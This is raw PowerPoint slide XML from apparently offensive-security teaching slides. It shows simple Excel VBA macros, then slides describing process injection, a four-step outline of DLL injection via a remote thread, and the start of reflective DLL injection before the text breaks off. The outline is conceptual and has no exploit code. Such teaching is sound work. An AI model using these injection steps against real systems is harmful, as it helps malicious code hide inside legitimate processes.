                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shortcut to open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MSapps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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="978462"/>
            <a:ext cx="10753725" cy="3767137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OpenMSApps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dim </a:t>
            </a:r>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 As Integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>InputBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>("Enter the application you wish to open - use 0 for calculator, 1 for word, 2 for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>powerpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, 3 for outlook, 4 for access")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Application.ActivateMicrosoftApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Index:=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</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End Sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F89F34A-F3FD-FBF0-273F-A3DD07DB4361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="735" t="6274" r="7207" b="18301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5647765" y="2519082"/>
            <a:ext cx="6248400" cy="4043082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3870636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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700087" y="295836"/>
            <a:ext cx="10772775" cy="674313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Shortcut to open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MSapps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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="978462"/>
            <a:ext cx="10753725" cy="3767137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA1B3C8-DFE9-B0A6-E3CA-CA667F6345F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="35735" t="9281" r="8088" b="36863"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="2756973"/>
            <a:ext cx="4685458" cy="3074894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{456D21D3-2AFA-E9D2-CB13-0C9719B8F2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-1176" b="5359"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5733419" y="978462"/>
            <a:ext cx="6297215" cy="4337609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1E67B7-8528-67E0-72AB-D6E99ACCD781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="7426" t="20262" r="71471" b="18039"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5836024" y="2862030"/>
            <a:ext cx="2133600" cy="3636071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FDE1229-3ADD-D107-EEBA-E66236BB433B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4039705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DCE6-926D-30A6-B91A-C9007F601651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700087" y="295836"/>
            <a:ext cx="10772775" cy="674313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Workbook_Open_Close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BEF2DF-175D-555C-DD53-E4BF55D39405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="978462"/>
            <a:ext cx="10753725" cy="3767137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C049751-FDA9-51D8-F60E-5B2CE0B75C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869577" y="1120676"/>
            <a:ext cx="10753724" cy="2246769"/>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Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Workbook_Open_Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Workbooks.Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Filename:="D:\Demobook.xlsx"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Workbooks("Demobook.xlsx").Sheets(1).Range("a1:a25") = "Offensive Security"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Workbooks("Demobook.xlsx").Save</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Workbooks("Demobook.xlsx").Close</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End Sub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0F4D00-2519-7CBE-ED42-02C4FF0855CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="5621"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966447" y="2416641"/>
            <a:ext cx="7010400" cy="3721698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195429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6A8E4F-B223-42F9-8C90-66F5ED884B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="37206" t="30980" r="37721" b="23399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340223" y="416858"/>
            <a:ext cx="9511553" cy="6181165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391233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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="1001284"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Process Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABC4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1201271"/>
            <a:ext cx="10753725" cy="4930587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Process injection is a technique used to inject malicious code into running processes. Because it evades detection techniques, innocent processes run the malicious injected code, unknowingly infecting the systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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First, attackers breach the perimeter of an organization.  This includes techniques such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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phishing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password guessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and exploiting out-of-date or vulnerable software. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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second phase of an attack involves moving around a target's network to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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escalate privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and steal or encrypt sensitive data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="20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71360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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="1001284"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Injection (dynamic link libraries)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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1201271"/>
            <a:ext cx="10753725" cy="4930587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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malicious process injects the path to the malicious DLL in the legitimate process address space. The Injector process then invokes the DLL via a remote thread execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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Drawbacks</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malicious DLL needs to be saved on disk space.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malicious DLL will be visible in the import table. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2752513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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="1001284"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Steps for performing the attack</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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1201271"/>
            <a:ext cx="10753725" cy="4930587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Locate the targeted process and create a handle to it.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Allocate the space for injecting the path of the DLL file.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Write the path of the DLL into the allocated space.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Execute the DLL by creating a remote thread. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838641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AF77-633E-1358-71AB-BB8B7A25353A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657606" y="304800"/>
            <a:ext cx="10772775" cy="1001284"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reflective DLL injection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C4F2FC-DD0A-1C91-9791-C53E7075D377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1201271"/>
            <a:ext cx="10753725" cy="4930587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Refers to loading a DLL from memory rather than from disk. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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Windows does not have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
